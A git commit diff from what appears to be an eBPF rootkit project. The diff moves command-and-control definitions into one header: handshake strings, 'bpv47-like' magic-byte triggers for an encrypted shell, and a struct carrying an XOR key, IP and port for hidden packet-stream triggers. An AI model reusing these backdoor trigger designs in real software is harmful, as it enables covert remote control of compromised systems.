Completed message sharing, starting with protocol now

2025-12-25 10:53:09 +08:00 · 2022-05-05 22:14:28 -04:00
parent 213e30ba3b
commit cceca23478
11 changed files with 116 additions and 107 deletions
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -1,22 +1,31 @@
 #ifndef __BPF_CC_H
 #define __BPF_CC_H

-#include "protocol.h"
-
+//C&C V0
 #define CC_PROT_SYN "CC_SYN"
 #define CC_PROT_ACK "CC_ACK"
 #define CC_PROT_MSG "CC_MSG#"
 #define CC_PROT_FIN_PART "CC_FIN"
 #define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART

-//C&C V1 -- bpv47-like trigger
+//C&C V1 -- bpv47-like trigger + encrypted shell
 #define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
 #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
 #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
 #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
-
 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02

+#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
+
+//C&C V2 -- Distributed hidden payload in packet stream
+struct trigger_t {
+    unsigned char xor_key;
+    unsigned int ip;
+    short unsigned int port;
+    unsigned char pad1;
+    short unsigned int pad2;
+    short unsigned int crc;
+};


 #endif
--- a/src/common/protocol.h
+++ b/src/common/protocol.h
@@ -1,19 +0,0 @@
-#ifndef __PROTOCOL_H
-#define __PROTOCOL_H
-
-//V1
-#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
-
-//V2
-struct trigger_t {
-    unsigned char xor_key;
-    unsigned int ip;
-    short unsigned int port;
-    unsigned char pad1;
-    short unsigned int pad2;
-    short unsigned int crc;
-};
-
-
-
-#endif